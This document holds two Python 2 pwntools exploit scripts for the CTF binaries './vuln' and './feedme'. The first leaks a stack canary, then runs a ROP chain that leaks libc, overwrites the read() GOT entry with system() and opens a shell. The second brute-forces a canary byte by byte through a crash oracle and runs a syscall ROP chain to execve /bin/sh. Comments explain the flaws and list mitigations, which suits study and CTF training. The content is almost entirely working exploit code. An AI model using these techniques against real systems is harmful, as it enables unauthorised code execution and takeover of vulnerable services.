
exploit.py


from pwn import *

  

# Exploit script for the CTF binary "./vuln" (Python 2 syntax: print
# statements, str used for raw bytes).  Kept as a worked example of how
# three weaknesses chain together: (1) an output routine that prints past
# the end of the artist field and so discloses the stack canary; (2) a
# stack overflow in the same field that lets the canary be replayed and
# the return address replaced; (3) a writable GOT (no full RELRO) in a
# non-PIE image, so PLT/GOT addresses and the gadget below are fixed.
# Any one of: bounded copies, full RELRO, PIE, or NUL-terminating the
# echoed field before printing it, breaks the chain.
p = process("./vuln")

e = ELF("./vuln")

l = e.libc  # libc pwntools believes the process loaded; only symbol offsets are used


print p.recvuntil("\n")

p.sendline("youngsin")  # answer to the name prompt

# Create 99 entries through menu option 1 so that entry numbers 99 and 100
# exist for the edit step below.  Prompt strings are the binary's own.
for i in range(1,100):

    print p.sendlineafter("\tselect\t|\t\n","1")

    print p.sendlineafter("music\t|\t","A")

    print p.sendlineafter("\tartist\t|\t","B")


# Edit (option 3) entries 99 and 100.  Entry 100's artist is written with
# send(), not sendline(), so no newline terminates the 21-byte string;
# "12345" is a marker used to locate the bytes that follow it in the output.
for i in range(99,101):

    print p.sendlineafter("\tselect\t|\t\n","3")

    print p.sendlineafter("select number\t|\t\n",str(i))

    print p.sendlineafter("music\t|\t","A"*19)


    if i==100:

        print p.sendafter("artist\t|\t","F"*16+"12345")

    else:

        print p.sendlineafter("artist\t|\t","B"*24)


# Option 2 apparently prints the entries; the print runs past the marker and
# emits the three non-zero bytes of the stack canary (its low byte is 0x00
# on this target, which is why it is prepended by hand below).
print p.sendlineafter("\tselect\t|\t\n","2")

print p.recvuntil("12345")


canary = "\x00"+p.recv(3)

pppr = 0x080495ad  # NOTE(review): name suggests a pop;pop;pop;ret gadget — not verifiable from this script

binsh = "/bin/sh\x00"


# Stack layout implied by the offsets: 20 bytes of buffer, the 4-byte
# canary, then 12 bytes up to the saved return address.
payload = "A"*20

payload += canary

payload += "A"*12


# ROP chain, stage 1: write(1, &GOT[read], 4) leaks read()'s libc address.
payload += p32(e.plt['write'])

payload += p32(pppr)

payload += p32(1)

payload += p32(e.got['read'])

payload += p32(4)


# Stage 2: read(0, .bss, 8) stores the "/bin/sh" string in writable memory.
payload += p32(e.plt['read'])

payload += p32(pppr)

payload += p32(0)

payload += p32(e.bss())

payload += p32(len(binsh))


# Stage 3: read(0, &GOT[read], 4) overwrites read()'s GOT slot with the
# address sent at the end of the script — possible only because the
# binary was linked without full RELRO.
payload += p32(e.plt['read'])

payload += p32(pppr)

payload += p32(0)

payload += p32(e.got['read'])

payload += p32(4)


# Stage 4: the same PLT stub now dispatches through the overwritten slot
# with the .bss string as its only argument.  The 4 filler bytes are the
# never-used return address of this final call.
payload += p32(e.plt['read'])

payload += "A"*4

payload += p32(e.bss())


# Deliver the payload through the same edit path used for the leak; option 4
# presumably returns from the vulnerable function ("BYE") and starts the chain.
print p.sendlineafter("\tselect\t|\t\n","3")

print p.sendlineafter("select number\t|\t\n","100")

print p.sendlineafter("music\t|\t","A"*19)

print p.sendafter("artist\t|\t",payload)

print p.sendlineafter("\tselect\t|\t\n","4")

print p.recvuntil("BYE\n\n")



# Stage-1 output: 4 raw bytes of read()'s address; system() is resolved
# relative to it using the libc symbol offsets.
read_addr = u32(p.recv(4).ljust(4,"\x00"))

libc_base = read_addr - l.symbols['read']

system_addr = libc_base + l.symbols['system']


# Inputs for stages 2 and 3, in chain order.  sendline() appends "\n" but
# the chain's read(…, 4) consumes only 4 bytes; the leftover newline is
# presumably inherited by whatever the redirected call spawns.  send()
# would be the cleaner choice.
p.send(binsh)

p.sendline(p32(system_addr))

p.interactive()



exploit.py


from pwn import *

  

# Exploit script for the "./feedme" binary (Python 2 syntax).  Two
# weaknesses are chained: the service keeps serving after a crashed
# request with the same canary value, so the canary can be recovered one
# byte at a time using the stack-protector abort as an oracle; and the
# request body overflows a stack buffer.  The chain is pure syscall ROP
# against fixed addresses, i.e. a static, non-PIE image.
# Defensive takeaways: re-randomise the canary per request (re-exec
# instead of fork), build with PIE, and bound the copy.
p = process("./feedme")


e = ELF("./feedme")


canary = ""

p.recvuntil("FEED ME!\n")

# Byte-wise canary recovery.  The wire format is a one-byte length followed
# by the body (the two send() calls).  0x20 bytes of padding place the
# guessed byte on the next undetermined canary byte; a guess that does not
# trigger the stack-protector abort is kept.  If no guess succeeds for a
# position (e.g. a timeout instead of the abort message), the loop moves on
# silently with a short canary.
for j in range(0,4):

    for i in range(0,256):

        payload = "A"*0x20+canary+chr(i)

        p.send(chr(len(payload)))

        p.send(payload)

        result = p.recvuntil("FEED ME!\n")

        if not "stack smashing detected" in result:

            canary += chr(i)

            print canary

            break


print "Find Canary = " + canary


# Gadget addresses inside the static binary.  NOTE(review): the names
# suggest int 0x80 / pop eax / pop ecx,pop ebx / pop edx gadgets, which is
# consistent with the value order used below but not verifiable here.
syscall = 0x0806fa1e

par = 0x080bb496

pcpbr = 0x0806f371

pdr = 0x0806f34a

bss = e.bss()

binsh = "/bin/sh\x00"



# Same stack layout as the brute force: 0x20 bytes of buffer, the canary,
# then 12 bytes up to the saved return address.
payload = "A"*0x20

payload += canary

payload += "A"*12

# Intended effect (per the gadget names): eax=3, ecx=bss, ebx=0,
# edx=len(binsh) -> read(0, bss, 8), pulling "/bin/sh" into writable memory.
payload += p32(par)

payload += p32(0x3)

payload += p32(pcpbr)

payload += p32(bss)

payload += p32(0)

payload += p32(pdr)

payload += p32(len(binsh))

payload += p32(syscall)


# Intended effect: eax=0xb, ecx=0, ebx=bss, edx=0 -> execve(bss, NULL, NULL).
payload += p32(par)

payload += p32(0xb)

payload += p32(pcpbr)

payload += p32(0)

payload += p32(bss)

payload += p32(pdr)

payload += p32(0)

payload += p32(syscall)



p.send(chr(len(payload)))

p.send(payload)

# The pause presumably keeps the "/bin/sh" bytes from being coalesced into
# the request body above and instead delivers them to the chain's read().
sleep(0.1)

p.send(binsh)

p.interactive()

